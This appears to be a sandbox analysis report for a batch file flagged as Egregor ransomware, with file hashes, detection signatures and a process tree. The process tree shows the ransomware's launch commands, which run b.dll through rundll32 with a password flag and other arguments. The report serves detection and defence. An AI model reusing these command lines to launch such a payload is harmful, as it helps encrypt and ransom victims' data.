Overview

overview

10

Static

static

test-1

windows10_x64

10

test-1

windows10_x64

10

Analysis

  • max time kernel
    438s
  • max time network
    374s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04-11-2020 18:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    spr2.bat

  • Size

    98B

  • MD5

    2d88b7d73bd4e059ecd6cc0e14f8f27e

  • SHA1

    beca0cb2744e7b031434455e1725b378faa8ccf2

  • SHA256

    7d744d7f6f2b68a9984afb859308e88dfcff1b03b2d8ab40cefcd448fda3d876

  • SHA512

    36c21edd458398f7e2cf4e2a520c36546d246b2894e8b69443ff14ffda8613b5002d0fd110517e1e2800eca6106fec996d986781788f9ef0f2b8641396ff19ce

Score
10/10
egregorransomware

Malware Config

Signatures

  • Egregor Ransomware

    Variant of the Sekhmet ransomware first seen in September 2020.

    ransomwareegregor
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\spr2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\system32\rundll32.exe
      rundll32.exe "\\SRV01QW\sp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
      2⤵
        PID:2412
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:672
      • C:\Windows\System32\NOTEPAD.EXE
        "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\spr2.bat
        1⤵
        • Opens file in notepad (likely ransom note)
        PID:236
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\spr2.bat" "
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1924
        • C:\Windows\system32\rundll32.exe
          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1424
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\b.dll",DllRegisterServer --passegregor10 --append="antani" --multiproc
            3⤵
              PID:1640

        Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\spr2.bat
          MD5

          06601f912c2218111426670b30510d68

          SHA1

          fd4c25dd29d0a7dab5e095d4317a983fe9615caf

          SHA256

          9a97e6034d4c7cc94ba3c6ac6306f7e278609d7e3fcc50e6d3afc0b972cb8549

          SHA512

          e614ed7a62b81c1ccaecb4a9a70158568db1fb50b85d41607d9d6b1628f015c8fd7e655f5ff613047e0ba918f5588508ac7a42f323f814e51b3a8b7f0859d214

          Download Submit
        • memory/1424-2-0x0000000000000000-mapping.dmp
          Download
        • memory/1640-3-0x0000000000000000-mapping.dmp
          Download
        • memory/1640-4-0x0000000004A20000-0x0000000004A5F000-memory.dmp
          Filesize

          252KB

          Download
        • memory/2412-0-0x0000000000000000-mapping.dmp
          Download